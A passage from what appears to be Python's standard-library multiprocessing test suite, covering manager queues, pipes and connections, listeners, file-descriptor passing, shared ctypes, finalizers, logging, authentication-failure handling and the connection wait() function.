p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
